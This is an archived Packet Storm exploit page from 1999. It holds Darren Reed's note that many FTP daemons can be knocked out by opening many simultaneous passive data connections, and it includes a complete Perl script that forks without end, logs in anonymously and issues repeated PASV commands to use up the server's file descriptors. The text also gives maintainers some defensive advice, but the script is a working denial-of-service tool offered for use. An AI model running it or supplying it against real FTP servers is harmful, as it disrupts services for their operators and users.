exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

ftpd.dos.pl

ftpd.dos.pl
Posted Dec 7, 1999
Authored by Darren Reed

Many ftp daemons are vulnerable to a DoS when muiltiple data connections are opened. Perl exploit included.

tags | exploit, perl
SHA-256 | 494698fc92b88b92340012fe5f75b91c533820b5dd2184d266290d4eecc25efb

ftpd.dos.pl

Change Mirror Download
Who has more free file descriptors & network ports, you or the ftp server ?

ftpd's which limit connections to 1 per user@host or similar may have some
defense against this, or if they don't support multiple data connections
open at the same time. I suspect "many" is the number of ftpd's which are
vulnderable to this attack so I've made no attempt (except in one case) to
contact vendors because there are just too many damn vendors, not to mention
ftpd's! But basically, if the other end has, on average, maximum fd limit
at 63, allows 50 connections, that's 3000 open fd's. I'm not sure how many
ftpd's are setup with that many open files as a part of the sytem, but not
many, I suspect.

No apologies for using perl(5), I just wanted a quick prototype. It's not
perfect but then I did't want to spend too much time on this.

to ftpd maintainers:
I don't know of any ftp clients which make use of this feature (multiple
data channels supported concurrently) as the original ftp clients were all
line-based and only suported one transfer at a time. Maybe this is
reasonable, but it would be a shame for the default defense to this attack
to mean you can't use FTP to it's full potential (i.e. start a transfer
from the current session but keep using the current `login' session, maybe
to start other transfers, as requried). Triming the number of concurrent
data sessions to a maximum of 1-5 (by default) would probably be enough,
with the capability to set this higher/lower as required.

Darren


#!/usr/bin/perl

$DOS_HOST="localhost";

use IO::Socket;

$pid = $$;
$num = 0;

while (1) {
while (fork) {
$sock = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => $DOS_HOST,
PeerPort => "ftp(21)",
);

if (!$sock) {
print "connect failed!\n";
waitpid -1,0;
}


while (<$sock>) {
print;
print $sock "USER anonymous\r\n" if (/^220 .*/);
print $sock "PASS root@\r\n" if (/^331 .*/);
print $sock "PASV\r\n" if (/^230 .*/);

if (/^227 .*/) {
$remote = $_;
$remote =~ s/^.* [^\d,]*(\d[\d,]+)[^\d,]*$/$1/;
@bits = split(/,/, $remote);
if ($#bits eq 5) {
$remport = $bits[4] * 256 + $bits[5];
$#bits = 3;
$remip = join('.', @bits);
$foo[$num++] = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => $remip,
PeerPort => "($remport)");
}
print $sock "PASV\r\n";
}
last if (/^530 .*/);
}
waitpid -1,0;
}
sleep(5);
}

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    44 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close